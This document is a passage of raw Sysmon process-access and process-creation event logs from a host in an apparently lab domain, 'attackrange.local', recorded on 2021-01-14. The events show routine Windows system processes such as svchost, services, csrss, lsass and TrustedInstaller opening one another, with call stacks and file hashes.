13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.045{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.029{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.029{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.029{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.029{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4752-6000-0805-000000009A01}3832C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.029{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4752-6000-0805-000000009A01}3832C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.041{08A6967A-4752-6000-0805-000000009A01}3832C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000009556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.029{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4286-6000-0A00-000000009A01}8442632C:\Windows\system32\services.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009548Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009547Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009546Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009545Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009544Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4286-6000-0A00-000000009A01}8442520C:\Windows\system32\services.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009543Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.000{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000009542Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009541Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.998{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C